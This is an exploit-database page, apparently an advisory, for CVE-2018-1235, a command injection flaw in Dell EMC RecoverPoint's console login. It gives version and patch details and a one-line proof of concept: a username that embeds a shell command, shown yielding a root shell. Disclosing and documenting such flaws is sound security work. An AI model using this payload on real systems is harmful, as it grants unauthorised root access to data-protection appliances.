header-logo
Suggest Exploit
vendor:
RecoverPoint
by:
Paul Taylor
9.8
CVSS
CRITICAL
Local Root Command Execution
78
CWE
Product Name: RecoverPoint
Affected Version From: All versions before RP 5.1.2, and all versions before RP4VMs 5.1.1.3
Affected Version To: 5.1.1.2
Patch Exists: YES
Related CWE: CVE-2018-1235
CPE: a:dell:emc_recoverpoint
Metasploit:
Other Scripts:
Platforms Tested: RP4VMs 5.1.1.2, RP 5.1.SP1.P2
2018

Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution

An OS command injection vulnerability exists in the mechanism which processes usernames which are presented for authentication, allowing unauthenticated root access via tty console login.

Mitigation:

Apply the patch provided by Dell EMC to upgrade to version 5.1.2 or later.
Source

Exploit-DB raw data:

# Exploit Title: Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution
# Date: 2018-06-21
# Exploit Author: Paul Taylor
# Version: All versions before RP 5.1.2, and all versions before RP4VMs 5.1.1.3
# Vendor Advisory: DSA-2018-095
# Vendor KB: https://support.emc.com/kb/521234
# Github: https://github.com/bao7uo/dell-emc_recoverpoint
# Website: https://www.foregenix.com/blog/foregenix-identify-multiple-dellemc-recoverpoint-zero-day-vulnerabilities
# Tested on: RP4VMs 5.1.1.2, RP 5.1.SP1.P2
# CVE: CVE-2018-1235
 
# 1. Description
# An OS command injection vulnerability exists in the mechanism which processes usernames 
# which are presented for authentication, allowing unauthenticated root access 
# via tty console login.
 
# 2. Proof of Concept
# Inject into local tty console login prompt

recoverpoint login: $(bash > &2)
root@recoverpoint:/# id
uid=0(root) gid=0(root) groups=0(root)
root@recoverpoint:/#